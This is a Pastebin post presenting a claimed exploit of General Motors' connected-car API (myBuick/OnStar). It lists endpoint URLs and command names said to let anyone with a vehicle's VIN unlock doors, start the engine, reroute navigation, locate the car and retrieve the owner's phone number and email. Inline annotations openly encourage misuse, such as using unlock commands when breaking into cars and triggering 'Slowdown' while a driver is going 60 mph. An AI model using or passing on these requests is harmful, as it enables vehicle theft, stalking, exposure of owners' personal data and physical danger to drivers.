Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [Discovered By: SmallDoink#0666]
- [Discovered By: FuckBinary]
- [Discovered By: ScaredKYS]
- myBuick Exploit - 22/09/2019
- --
- Affected Vehicles]
- Buick (2017-2020 Models)
- Cadillac (2017-2020 Models)
- Chevrolet (2019-2020 Models)
- GMC (2019-2020 Models)
- --
- Start]
- The myBuick app has the ability to:
- - Alert vehicles (Alarm)
- - Stop Charging the Car
- - View Data Usage (Car Hotspot)
- - View Car Information (Mileage, PSI, Gas Level, Gas Used, Trips, Call Status)
- - Lock Car Doors/Unlock Car Doors
- - Change Car Route
- - Start/Shut Off the Car
- - Grab the Car Location
- With the cars VIN (Vehicle Identification Number), you can do all of the above to the target car. Meaning if you go into a parking lot, grab a Buick's Model # and it's VIN, you could unlock the doors from your phone.
- -
- Why has nobody tried this?]
- The reason nobody has tried to exploit this ability before is because you need a registered myBuick account. Which until recently, are available to make without purchasing a GM car. This feature allows ease to the consumers life, but at what cost? "Hackers" have the ability to grab information on your car and even lock or unlock the doors. Going to the beach? I don't think so. With this exploit, I can change the route your car is traveling without even alerting you, so instead of the beach, you're going to the strip club.
- -
- Code]
- No code is needed to exploit this function, just make a request:
- https://api.gm.com/api/v1/account/vehicles/CARVIN/commands/commandgoeshere
- Available Commands:]
- unlockDoor
- alert
- cancelAlert
- cancelStart
- telemetryOptIn
- telemetryOptOut
- start
- cancelStart
- diagnostics
- sendTBTRoute
- location
- sendNavDestination (/CARVIN/navUnit/commands/)
- disable (/CARVIN/hotspot/commands/)
- enable (/CARVIN/hotspot/commands/)
- getHotspotInfo (/CARVIN/hotspot/commands/)
- getHotspotStatus (/CARVIN/hotspot/commands/)
- setHotspotInfo (/CARVIN/hotspot/commands/)
- Want Owner Info on any Buick Car?]
- Just send a request here
- https://api.gm.com/api/v1/account/vehicles/CARVINHERE
- It will return this
- },
- "features": {
- "feature": [
- "AntiLockBraking",
- "TirePressure",
- "BlueTooth",
- "VirtualAdvisor",
- "POIDownload",
- "LockUnlock",
- "RemoteStart", (Very good command | Use when breaking into cars)
- "OnstarDestinationDownload",
- "Slowdown", (Very good command | Turn on when driver is going 60MPH)
- "TurnByTurn",
- "unlockDoor", (Very good command | Use when breaking into cars)
- "lockDoor", (Very good command | Use when breaking into cars)
- "alert" (It's an alright command | Use at midnight)
- ]
- },
- "make": "CAR MAKE",
- "manufacturer": "General Motors",
- "model": "MODEL",
- "phone": "OWNER PHONE NUMBER",
- "primaryDriverId": ACCOUNTID,
- "primaryDriverURL": "https://api.gm.com/api/v1/account/subscribers/ACCOUNTID",
- "propulsionType": "TYPE",
- "unitType": "EMBEDDED",
- "url": "https://api.gm.com/api/v1/account/vehicles/CARVINHERE",
- "vehiclePrograms": {
- "vehicleProgram": [
- {
- "isOptedIn": "true",
- "name": "OnStar Vehicle Diagnostics",
- "optedInEmailAddress": "OWNER EMAIL ADDRESS"
- },
- {
- "isOptedIn": "false",
- "name": "Dealer Maintenance Notification"
- }
- ]
- },
- "vin": "CARVINHERE",
- "year": "YEAR CAR MADE"
- }
- }
- Want the car's diagnostics?]
- https://api.gm.com/api/v1/account/vehicles/CAR VIN GOES HERE/commands/diagnostics
- {
- "commandData": {
- "supportedDiagnostics": {
- "supportedDiagnostic": [
- "LIFETIME FUEL USED",
- "LIFETIME FUEL ECON",
- "LAST TRIP DISTANCE",
- "ODOMETER",
- "LAST TRIP FUEL ECONOMY",
- "TIRE PRESSURE",
- "OIL LIFE",
- "FUEL TANK INFO",
- "VEHICLE RANGE"
- ]
- }
- },
- [Discovered By: SmallDoink#0666]
- [Discovered By: FuckBinary]
- [Discovered By: ScaredKYS]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement